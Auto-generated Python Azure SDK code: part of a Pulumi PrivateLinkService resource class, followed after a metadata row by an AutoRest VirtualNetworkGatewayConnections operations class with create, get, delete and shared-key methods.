:param pulumi.Input['PrivateLinkServicePropertiesAutoApprovalArgs'] auto_approval: The auto-approval list of the private link service.
:param pulumi.Input[bool] enable_proxy_protocol: Whether the private link service is enabled for proxy protocol or not.
:param pulumi.Input['ExtendedLocationArgs'] extended_location: The extended location of the load balancer.
:param pulumi.Input[Sequence[pulumi.Input[str]]] fqdns: The list of Fqdn.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[Sequence[pulumi.Input['PrivateLinkServiceIpConfigurationArgs']]] ip_configurations: An array of private link service IP configurations.
:param pulumi.Input[Sequence[pulumi.Input['FrontendIPConfigurationArgs']]] load_balancer_frontend_ip_configurations: An array of references to the load balancer IP configurations.
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[str] service_name: The name of the private link service.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input['PrivateLinkServicePropertiesVisibilityArgs'] visibility: The visibility list of the private link service.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if auto_approval is not None:
pulumi.set(__self__, "auto_approval", auto_approval)
if enable_proxy_protocol is not None:
pulumi.set(__self__, "enable_proxy_protocol", enable_proxy_protocol)
if extended_location is not None:
pulumi.set(__self__, "extended_location", extended_location)
if fqdns is not None:
pulumi.set(__self__, "fqdns", fqdns)
if id is not None:
pulumi.set(__self__, "id", id)
if ip_configurations is not None:
pulumi.set(__self__, "ip_configurations", ip_configurations)
if load_balancer_frontend_ip_configurations is not None:
pulumi.set(__self__, "load_balancer_frontend_ip_configurations", load_balancer_frontend_ip_configurations)
if location is not None:
pulumi.set(__self__, "location", location)
if service_name is not None:
pulumi.set(__self__, "service_name", service_name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if visibility is not None:
pulumi.set(__self__, "visibility", visibility)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="autoApproval")
def auto_approval(self) -> Optional[pulumi.Input['PrivateLinkServicePropertiesAutoApprovalArgs']]:
"""
The auto-approval list of the private link service.
"""
return pulumi.get(self, "auto_approval")
@auto_approval.setter
def auto_approval(self, value: Optional[pulumi.Input['PrivateLinkServicePropertiesAutoApprovalArgs']]):
pulumi.set(self, "auto_approval", value)
@property
@pulumi.getter(name="enableProxyProtocol")
def enable_proxy_protocol(self) -> Optional[pulumi.Input[bool]]:
"""
Whether the private link service is enabled for proxy protocol or not.
"""
return pulumi.get(self, "enable_proxy_protocol")
@enable_proxy_protocol.setter
def enable_proxy_protocol(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_proxy_protocol", value)
@property
@pulumi.getter(name="extendedLocation")
def extended_location(self) -> Optional[pulumi.Input['ExtendedLocationArgs']]:
"""
The extended location of the load balancer.
"""
return pulumi.get(self, "extended_location")
@extended_location.setter
def extended_location(self, value: Optional[pulumi.Input['ExtendedLocationArgs']]):
pulumi.set(self, "extended_location", value)
@property
@pulumi.getter
def fqdns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The list of Fqdn.
"""
return pulumi.get(self, "fqdns")
@fqdns.setter
def fqdns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "fqdns", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter(name="ipConfigurations")
def ip_configurations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['PrivateLinkServiceIpConfigurationArgs']]]]:
"""
An array of private link service IP configurations.
"""
return pulumi.get(self, "ip_configurations")
@ip_configurations.setter
def ip_configurations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['PrivateLinkServiceIpConfigurationArgs']]]]):
pulumi.set(self, "ip_configurations", value)
@property
@pulumi.getter(name="loadBalancerFrontendIpConfigurations")
def load_balancer_frontend_ip_configurations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['FrontendIPConfigurationArgs']]]]:
"""
An array of references to the load balancer IP configurations.
"""
return pulumi.get(self, "load_balancer_frontend_ip_configurations")
@load_balancer_frontend_ip_configurations.setter
def load_balancer_frontend_ip_configurations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['FrontendIPConfigurationArgs']]]]):
pulumi.set(self, "load_balancer_frontend_ip_configurations", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="serviceName")
def service_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the private link service.
"""
return pulumi.get(self, "service_name")
@service_name.setter
def service_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def visibility(self) -> Optional[pulumi.Input['PrivateLinkServicePropertiesVisibilityArgs']]:
"""
The visibility list of the private link service.
"""
return pulumi.get(self, "visibility")
@visibility.setter
def visibility(self, value: Optional[pulumi.Input['PrivateLinkServicePropertiesVisibilityArgs']]):
pulumi.set(self, "visibility", value)
class PrivateLinkService(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
auto_approval: Optional[pulumi.Input[pulumi.InputType['PrivateLinkServicePropertiesAutoApprovalArgs']]] = None,
enable_proxy_protocol: Optional[pulumi.Input[bool]] = None,
extended_location: Optional[pulumi.Input[pulumi.InputType['ExtendedLocationArgs']]] = None,
fqdns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
id: Optional[pulumi.Input[str]] = None,
ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PrivateLinkServiceIpConfigurationArgs']]]]] = None,
load_balancer_frontend_ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FrontendIPConfigurationArgs']]]]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
service_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
visibility: Optional[pulumi.Input[pulumi.InputType['PrivateLinkServicePropertiesVisibilityArgs']]] = None,
__props__=None):
"""
Private link service resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['PrivateLinkServicePropertiesAutoApprovalArgs']] auto_approval: The auto-approval list of the private link service.
:param pulumi.Input[bool] enable_proxy_protocol: Whether the private link service is enabled for proxy protocol or not.
:param pulumi.Input[pulumi.InputType['ExtendedLocationArgs']] extended_location: The extended location of the load balancer.
:param pulumi.Input[Sequence[pulumi.Input[str]]] fqdns: The list of Fqdn.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PrivateLinkServiceIpConfigurationArgs']]]] ip_configurations: An array of private link service IP configurations.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FrontendIPConfigurationArgs']]]] load_balancer_frontend_ip_configurations: An array of references to the load balancer IP configurations.
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] service_name: The name of the private link service.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[pulumi.InputType['PrivateLinkServicePropertiesVisibilityArgs']] visibility: The visibility list of the private link service.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PrivateLinkServiceInitArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Private link service resource.
:param str resource_name: The name of the resource.
:param PrivateLinkServiceInitArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PrivateLinkServiceInitArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
auto_approval: Optional[pulumi.Input[pulumi.InputType['PrivateLinkServicePropertiesAutoApprovalArgs']]] = None,
enable_proxy_protocol: Optional[pulumi.Input[bool]] = None,
extended_location: Optional[pulumi.Input[pulumi.InputType['ExtendedLocationArgs']]] = None,
fqdns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
id: Optional[pulumi.Input[str]] = None,
ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['PrivateLinkServiceIpConfigurationArgs']]]]] = None,
load_balancer_frontend_ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FrontendIPConfigurationArgs']]]]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
service_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
visibility: Optional[pulumi.Input[pulumi.InputType['PrivateLinkServicePropertiesVisibilityArgs']]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PrivateLinkServiceInitArgs.__new__(PrivateLinkServiceInitArgs)
__props__.__dict__["auto_approval"] = auto_approval
__props__.__dict__["enable_proxy_protocol"] = enable_proxy_protocol
__props__.__dict__["extended_location"] = extended_location
__props__.__dict__["fqdns"] = fqdns
__props__.__dict__["id"] = id
__props__.__dict__["ip_configurations"] = ip_configurations
__props__.__dict__["load_balancer_frontend_ip_configurations"] = load_balancer_frontend_ip_configurations
__props__.__dict__["location"] = location
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["service_name"] = service_name
__props__.__dict__["tags"] = tags
__props__.__dict__["visibility"] = visibility
__props__.__dict__["alias"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["name"] = None
__props__.__dict__["network_interfaces"] = None
__props__.__dict__["private_endpoint_connections"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/v20210201:PrivateLinkService"), pulumi.Alias(type_="azure-native:network:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20190401:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20190401:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20190601:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20190601:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20190701:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20190701:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20190801:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20190801:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20190901:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20190901:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20191101:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20191101:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20191201:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20191201:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20200301:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20200301:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20200401:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20200401:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20200501:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20200501:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20200601:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20200601:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20200701:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20200701:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20200801:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20200801:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20201101:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20201101:PrivateLinkService"), pulumi.Alias(type_="azure-native:network/v20210301:PrivateLinkService"), pulumi.Alias(type_="azure-nextgen:network/v20210301:PrivateLinkService")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(PrivateLinkService, __self__).__init__(
'azure-native:network/v20210201:PrivateLinkService',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'PrivateLinkService':
"""
Get an existing PrivateLinkService resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = PrivateLinkServiceInitArgs.__new__(PrivateLinkServiceInitArgs)
__props__.__dict__["alias"] = None
__props__.__dict__["auto_approval"] = None
__props__.__dict__["enable_proxy_protocol"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["extended_location"] = None
__props__.__dict__["fqdns"] = None
__props__.__dict__["ip_configurations"] = None
__props__.__dict__["load_balancer_frontend_ip_configurations"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["network_interfaces"] = None
__props__.__dict__["private_endpoint_connections"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
__props__.__dict__["visibility"] = None
return PrivateLinkService(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def alias(self) -> pulumi.Output[str]:
"""
The alias of the private link service.
"""
return pulumi.get(self, "alias")
@property
@pulumi.getter(name="autoApproval")
def auto_approval(self) -> pulumi.Output[Optional['outputs.PrivateLinkServicePropertiesResponseAutoApproval']]:
"""
The auto-approval list of the private link service.
"""
return pulumi.get(self, "auto_approval")
@property
@pulumi.getter(name="enableProxyProtocol")
def enable_proxy_protocol(self) -> pulumi.Output[Optional[bool]]:
"""
Whether the private link service is enabled for proxy protocol or not.
"""
return pulumi.get(self, "enable_proxy_protocol")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter(name="extendedLocation")
def extended_location(self) -> pulumi.Output[Optional['outputs.ExtendedLocationResponse']]:
"""
The extended location of the load balancer.
"""
return pulumi.get(self, "extended_location")
@property
@pulumi.getter
def fqdns(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The list of Fqdn.
"""
return pulumi.get(self, "fqdns")
@property
@pulumi.getter(name="ipConfigurations")
def ip_configurations(self) -> pulumi.Output[Optional[Sequence['outputs.PrivateLinkServiceIpConfigurationResponse']]]:
"""
An array of private link service IP configurations.
"""
return pulumi.get(self, "ip_configurations")
@property
@pulumi.getter(name="loadBalancerFrontendIpConfigurations")
def load_balancer_frontend_ip_configurations(self) -> pulumi.Output[Optional[Sequence['outputs.FrontendIPConfigurationResponse']]]:
"""
An array of references to the load balancer IP configurations.
"""
return pulumi.get(self, "load_balancer_frontend_ip_configurations")
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="networkInterfaces")
def network_interfaces(self) -> pulumi.Output[Sequence['outputs.NetworkInterfaceResponse']]:
"""
An array of references to the network interfaces created for this private link service.
"""
return pulumi.get(self, "network_interfaces")
@property
@pulumi.getter(name="privateEndpointConnections")
def private_endpoint_connections(self) -> pulumi.Output[Sequence['outputs.PrivateEndpointConnectionResponse']]:
"""
An array of list about connections to the private endpoint.
"""
return pulumi.get(self, "private_endpoint_connections")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of the private link service resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def visibility(self) -> pulumi.Output[Optional['outputs.PrivateLinkServicePropertiesResponseVisibility']]:
"""
The visibility list of the private link service.
"""
return pulumi.get(self, "visibility")
| 50.846939 | 2,459 | 0.686334 |
4a1b3d73b1dc60069fe6570205380e364bfbe5cf | 32,048 | py | Python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2017_08_01/operations/_virtual_network_gateway_connections_operations.py | iscai-msft/azure-sdk-for-python | 83715b95c41e519d5be7f1180195e2fba136fc0f | ["MIT"] | 1 | 2021-06-02T08:01:35.000Z | 2021-06-02T08:01:35.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2017_08_01/operations/_virtual_network_gateway_connections_operations.py | iscai-msft/azure-sdk-for-python | 83715b95c41e519d5be7f1180195e2fba136fc0f | ["MIT"] | 226 | 2019-07-24T07:57:21.000Z | 2019-10-15T01:07:24.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2017_08_01/operations/_virtual_network_gateway_connections_operations.py | iscai-msft/azure-sdk-for-python | 83715b95c41e519d5be7f1180195e2fba136fc0f | ["MIT"] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class VirtualNetworkGatewayConnectionsOperations(object):
"""VirtualNetworkGatewayConnectionsOperations operations.
    You should not instantiate this class directly; instead, create a Client instance that will create it for you and attach it as an attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client API version. Constant value: "2017-08-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-08-01"
self.config = config
def _create_or_update_initial(
self, resource_group_name, virtual_network_gateway_connection_name, parameters, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.create_or_update.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkGatewayConnectionName': self._serialize.url("virtual_network_gateway_connection_name", virtual_network_gateway_connection_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'VirtualNetworkGatewayConnection')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 201]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('VirtualNetworkGatewayConnection', response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualNetworkGatewayConnection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_or_update(
self, resource_group_name, virtual_network_gateway_connection_name, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
"""Creates or updates a virtual network gateway connection in the
specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_gateway_connection_name: The name of the
virtual network gateway connection.
:type virtual_network_gateway_connection_name: str
:param parameters: Parameters supplied to the create or update virtual
network gateway connection operation.
:type parameters:
~azure.mgmt.network.v2017_08_01.models.VirtualNetworkGatewayConnection
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns
VirtualNetworkGatewayConnection or
ClientRawResponse<VirtualNetworkGatewayConnection> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_08_01.models.VirtualNetworkGatewayConnection]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2017_08_01.models.VirtualNetworkGatewayConnection]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_network_gateway_connection_name=virtual_network_gateway_connection_name,
parameters=parameters,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('VirtualNetworkGatewayConnection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/connections/{virtualNetworkGatewayConnectionName}'}
def get(
self, resource_group_name, virtual_network_gateway_connection_name, custom_headers=None, raw=False, **operation_config):
"""Gets the specified virtual network gateway connection by resource
group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_gateway_connection_name: The name of the
virtual network gateway connection.
:type virtual_network_gateway_connection_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: VirtualNetworkGatewayConnection or ClientRawResponse if
raw=true
:rtype:
~azure.mgmt.network.v2017_08_01.models.VirtualNetworkGatewayConnection
or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkGatewayConnectionName': self._serialize.url("virtual_network_gateway_connection_name", virtual_network_gateway_connection_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('VirtualNetworkGatewayConnection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/connections/{virtualNetworkGatewayConnectionName}'}
def _delete_initial(
self, resource_group_name, virtual_network_gateway_connection_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkGatewayConnectionName': self._serialize.url("virtual_network_gateway_connection_name", virtual_network_gateway_connection_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, resource_group_name, virtual_network_gateway_connection_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes the specified virtual network Gateway connection.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_gateway_connection_name: The name of the
virtual network gateway connection.
:type virtual_network_gateway_connection_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
virtual_network_gateway_connection_name=virtual_network_gateway_connection_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/connections/{virtualNetworkGatewayConnectionName}'}
def _set_shared_key_initial(
self, resource_group_name, virtual_network_gateway_connection_name, value, custom_headers=None, raw=False, **operation_config):
parameters = models.ConnectionSharedKey(value=value)
# Construct URL
url = self.set_shared_key.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkGatewayConnectionName': self._serialize.url("virtual_network_gateway_connection_name", virtual_network_gateway_connection_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(parameters, 'ConnectionSharedKey')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 201]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ConnectionSharedKey', response)
if response.status_code == 201:
deserialized = self._deserialize('ConnectionSharedKey', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def set_shared_key(
self, resource_group_name, virtual_network_gateway_connection_name, value, custom_headers=None, raw=False, polling=True, **operation_config):
"""The Put VirtualNetworkGatewayConnectionSharedKey operation sets the
        virtual network gateway connection shared key for the specified virtual
        network gateway connection in the specified resource group through the
        Network resource provider.
